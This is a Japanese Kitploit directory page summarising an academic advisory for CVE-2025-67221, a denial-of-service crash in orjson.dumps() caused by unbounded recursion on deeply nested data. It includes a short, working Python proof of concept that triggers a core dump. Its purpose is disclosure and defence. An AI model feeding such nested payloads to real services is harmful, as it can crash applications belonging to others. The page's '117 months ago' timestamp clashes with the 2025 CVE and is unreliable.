Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-67221 — orjsonの脆弱性 | Kitploit
ツール/GitHubGitHub/kpatsakis/cve-2025-67221
脆弱性分析コード分析論文と研究学習と教育
GitHubkpatsakis/cve-2025-67221

CVE-2025-67221

orjsonの脆弱性

リポジトリを見る
117ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-67221

脆弱性概要

フィールド値
CVE IDCVE-2025-67221
影響を受ける製品orjson
影響を受けるバージョン≤ 3.11.4
脆弱性の種類サービス拒否 (制御不能な再帰)
攻撃ベクトルリモート (攻撃者が直列化データを制御可能な場合)

説明

orjson バージョン 3.11.4 以前の orjson.dumps() 関数にサービス拒否の脆弱性が存在します。この関数は、深くネストされた JSON データ構造を直列化する際に再帰制限を適用しません。アプリケーションに攻撃者が制御するネストされたデータを直列化させることができる攻撃者は、直列化ルーチンでクラッシュを引き起こす可能性があります。

影響を受ける関数

  • 関数: orjson.dumps()
  • ファイル: pysrc/orjson/__init__.pyi

テスト

テスト環境:

  • Python 3.12.3/3.11.2/3.12.3/3.13.9/3.14.0 on Ubuntu Linux kernel 6.8.0-88
  • Python 3.13.3 Microsoft Windows 11 Education 10.0.26200 Build 26200

影響

orjson を使用して信頼できないデータ構造や攻撃者によって制御されたデータ構造を直列化するアプリケーションは、サービス拒否攻撃に対して脆弱になる可能性があります。

再現コード

ローカルで脆弱性を再現するコード:

root@kitploit:~
import orjson
import sys
import platform
print(f'OS: {platform.platform()}') 
print(f'Python version: {sys. version}') 
print(f'orjson version: {orjson.__version__}')
nested = []
for i in range(100):
    nested = [{"level": i, "next": nested}]
dumped = orjson.dumps(nested)

##デモ 上記のコードは見事なコアダンプを引き起こします Demo

著者 / 研究者

  • Constantinos Patsakis, ピレウス大学情報学科, ギリシャ
  • Evgenios Gkritsis, アテネ経済大学情報学科, ギリシャ
  • George Stergiopoulos, アテネ経済大学情報学科, ギリシャ

参照

  • https://github.com/ijl/orjson (影響を受けるプロジェクト)
ツールをダウンロード